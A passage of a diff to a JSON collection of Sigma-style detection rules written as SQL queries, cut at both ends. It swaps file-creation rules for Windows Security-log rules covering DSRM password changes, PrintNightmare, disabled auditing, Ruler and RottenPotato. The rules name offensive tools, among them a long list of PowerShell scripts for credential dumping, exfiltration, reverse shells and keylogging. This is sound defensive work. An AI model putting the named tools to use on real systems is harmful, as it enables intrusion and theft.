TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) OR (TargetFilename LIKE '%.zip.exe' ESCAPE '\\' OR TargetFilename LIKE '%.rar.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ServiceFileName REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ServiceFileName REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ServiceFileName REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ServiceFileName REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ServiceFileName REGEXP '\\$VerbosePreference\\.ToString\\(' OR ServiceFileName REGEXP '\\String\\]\\s*\\$VerbosePreference'))" ], - "filename": "file_event_win_susp_double_extension.yml" + "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" }, { - "title": "Suspicious Creation TXT File in User Desktop", - "id": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", - "status": "test", - "description": "Ransomware create txt file in the user Desktop", - "author": "frack113", + "title": "Password Change on Directory Service Restore Mode (DSRM) Account", + "id": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", + "status": "stable", + "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.", + "author": "Thomas Patzke", "tags": [ - "attack.impact", - "attack.t1486" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Unknown" + "Initial installation of a domain controller" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.txt' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4794')" ], - "filename": "file_event_win_susp_desktop_txt.yml" + "filename": "win_security_susp_dsrm_password_change.yml" }, { - "title": "CVE-2022-24527 Microsoft Connected Cache LPE", - "id": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", - "status": "experimental", - "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", - "author": "Florian Roth (Nextron Systems)", + "title": "First Time Seen Remote Named Pipe", + "id": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", + "status": "test", + "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", + "author": "Samir Bousseaden", "tags": [ - "attack.privilege_escalation", - "attack.t1059.001", - "cve.2022.24527" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Unknown" + "Update the excluded named pipe to filter out any newly observed legit named pipe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%WindowsPowerShell\\\\Modules\\\\webAdministration\\\\webAdministration.psm1' ESCAPE '\\' AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\') AND NOT ((RelativeTargetName LIKE 'atsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'samr' ESCAPE '\\' OR RelativeTargetName LIKE 'lsarpc' ESCAPE '\\' OR RelativeTargetName LIKE 'lsass' ESCAPE '\\' OR RelativeTargetName LIKE 'winreg' ESCAPE '\\' OR RelativeTargetName LIKE 'netlogon' ESCAPE '\\' OR RelativeTargetName LIKE 'srvsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\' OR RelativeTargetName LIKE 'wkssvc' ESCAPE '\\' OR RelativeTargetName LIKE 'browser' ESCAPE '\\' OR RelativeTargetName LIKE 'netdfs' ESCAPE '\\' OR RelativeTargetName LIKE 'svcctl' ESCAPE '\\' OR RelativeTargetName LIKE 'spoolss' ESCAPE '\\' OR RelativeTargetName LIKE 'ntsvcs' ESCAPE '\\' OR RelativeTargetName LIKE 'LSM\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'HydraLsPipe' ESCAPE '\\' OR RelativeTargetName LIKE 'TermSrv\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'MsFteWds' ESCAPE '\\' OR RelativeTargetName LIKE 'sql\\\\query' ESCAPE '\\' OR RelativeTargetName LIKE 'eventlog' ESCAPE '\\')))" ], - "filename": "file_event_win_cve_2022_24527_lpe.yml" + "filename": "win_security_lm_namedpipe.yml" }, { - "title": "Creation Exe for Service with Unquoted Path", - "id": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", + "title": "Suspicious LDAP-Attributes Used", + "id": "d00a9a72-2c09-4459-ad03-5e0a23351e36", "status": "test", - "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n", - "author": "frack113", + "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", + "author": "xknow @xknow_infosec", "tags": [ - "attack.persistence", - "attack.t1547.009" + "attack.t1001.003", + "attack.command_and_control" ], "falsepositives": [ - "Unknown" + "Companies, who may use these default LDAP-Attributes for personal information" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\program.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeValue LIKE '%' ESCAPE '\\' AND AttributeLDAPDisplayName IN ('primaryInternationalISDNNumber', 'otherFacsimileTelephoneNumber', 'primaryTelexNumber'))" ], - "filename": "file_event_win_creation_unquoted_service_path.yml" + "filename": "win_security_susp_ldap_dataexchange.yml" }, { - "title": "Adwind RAT / JRAT File Artifact", - "id": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", + "title": "Hacktool Ruler", + "id": "24549159-ac1b-479c-8175-d42aea947cae", "status": "test", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "description": "This events that are generated when using the hacktool Ruler by Sensepost", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.discovery", "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.t1087", + "attack.t1114", + "attack.t1059", + "attack.t1550.002" + ], + "falsepositives": [ + "Go utilities that use staaldraad awesome NTLM library" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Oracle\\\\bin\\\\java%' ESCAPE '\\' AND TargetFilename LIKE '%.exe%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Retrive%' ESCAPE '\\' AND TargetFilename LIKE '%.vbs%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4776' AND Workstation = 'RULER') OR (EventID IN ('4624', '4625') AND WorkstationName = 'RULER')))" ], - "filename": "file_event_win_mal_adwind.yml" + "filename": "win_security_alert_ruler.yml" }, { - "title": "QuarksPwDump Dump File", - "id": "847def9e-924d-4e90-b7c4-5f581395a2b4", - "status": "test", - "description": "Detects a dump file written by QuarksPwDump password dumper", - "author": "Florian Roth (Nextron Systems)", + "title": "CVE-2021-1675 Print Spooler Exploitation IPC Access", + "id": "8fe1c584-ee61-444b-be21-e9054b229694", + "status": "experimental", + "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", + "author": "INIT_6", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.execution", + "attack.t1569", + "cve.2021.1675", + "cve.2021.34527" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM-%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss' AND AccessMask = '0x3' AND ObjectType = 'File')" ], - "filename": "file_event_win_hktl_quarkspw_filedump.yml" + "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml" }, { - "title": "APT29 2018 Phishing Campaign File Indicators", - "id": "3a3f81ca-652c-482b-adeb-b1c804727f74", - "status": "stable", - "description": "Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant", - "author": "@41thexplorer", + "title": "Disabling Windows Event Auditing", + "id": "69aeb277-f15f-4d2d-b32a-55e883609563", + "status": "test", + "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", + "author": "@neu5ron", "tags": [ - "attack.execution", - "attack.t1218.011" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%ds7002.lnk%' ESCAPE '\\' OR TargetFilename LIKE '%ds7002.pdf%' ESCAPE '\\' OR TargetFilename LIKE '%ds7002.zip%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4719' AND (AuditPolicyChanges LIKE '%\\%\\%8448%' ESCAPE '\\' OR AuditPolicyChanges LIKE '%\\%\\%8450%' ESCAPE '\\'))" ], - "filename": "file_event_win_apt_cozy_bear_phishing_campaign_indicators.yml" + "filename": "win_security_disable_event_logging.yml" }, { - "title": "Malicious PowerShell Scripts - FileCreation", - "id": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", + "title": "RottenPotato Like Attack Pattern", + "id": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", "status": "test", - "description": "Detects the creation of known offensive powershell scripts used for exploitation", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein", + "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", + "author": "@SBousseaden, Florian Roth", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1557.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Add-ConstrainedDelegationBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RemoteRegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-ScrnSaveBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Check-VM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ConvertTo-ROT13.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Copy-VSS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Create-MultipleSessions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DNS\\_TXT\\_Pwnage.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Do-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DomainPasswordSpray.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download\\_Execute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download-Execute-PS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enabled-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enable-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-Command-MSSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-DNSTXT-Code.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-OnTime.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ExetoText.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Exploit-Jboss.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-AVSignature.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-Fruit.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-GPOLocation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-TrustedDocuments.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireBuster.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireListener.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ApplicationHost.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ChromeDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ClipboardContents.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ComputerDetail.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-FoxDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPAutologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-IndexedItem.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Keystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-LSASecret.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-MicrophoneAudio.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHashes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHints.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAlwaysInstallElevated.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAutoLogon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RickAstley.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Screenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SecurityPackages.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceFilePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServicePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceUnquoted.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SiteListPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-System.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-TimedScreenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-UnattendedInstallFile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Unconstrained.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-USBKeystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VaultCredential.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnAutoRun.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnSchTask.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebConfig.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebCredentials.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WLAN-Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Gupt-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Login.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-ServiceBinary.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-SSP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ACLScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ADSBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-AmsiBypass.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ARPScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BackdoorLNK.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BadPotato.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BetterSafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BruteForce.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Carbuncle.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Certify.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ConPtyShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialsPhish.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DAFT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DCSync.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Decode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DinvokeKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DllInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DowngradeAccount.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EgressCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Encode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EventViewer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Eyewitness.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-FakeLogonScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Farmer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Get-RBCD-Threaded.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Gopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper2.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper3.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-HandleKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Interceptor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Internalmonologue.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-InveighRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRegsvr.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRundll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelayUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-LdapSignCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Lockless.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MalSCCM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MimikatzWDigestDowngrade.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikittenz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MITM6.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NanoDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetRipper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetworkRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NinjaCopy.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-OxidResolver.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshellx86.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Paranoia.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PortScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttps.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PostExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellIcmp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTCP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLineBind.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerThIEf.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PPLDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Prasadhak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcatAgent.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PSInject.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsUaCme.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReflectivePEInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReverseDNSLookup.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Rubeus.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-RunAs.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SauronEye.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SCShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Seatbelt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ServiceAbuse.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SessionGopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ShellCode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SMBScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Snaffler.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Spoolsample.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSHCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSIDExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StandIn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StickyNotesExtract.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tater.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Thunderfox.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ThunderStruck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TokenManipulation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tokenvator.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TotalExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UrbanBishop.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UserHunter.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-VoiceTroll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Whisker.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WinEnum.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-winPEAS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WireTap.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WmiCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WScriptBypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Zerologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Keylogger.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\MailRaider.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\New-HoneyHash.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\OfficeMemScraper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Offline\\_Winpwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-CHM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-DnsTxt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Excel.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-HTA.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Java.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-JS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Minidump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-RundllCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCF.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Shortcut.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-WebQuery.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Word.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Parse\\_Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Port-Scan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerBreach.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powercat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerRunAsSystem.psm1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerSharpPack.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUpSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerView.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PSAsyncShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RemoteHashRetrieval.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-PoshRat.ps1' ESCAPE '\\' OR TargetFilename 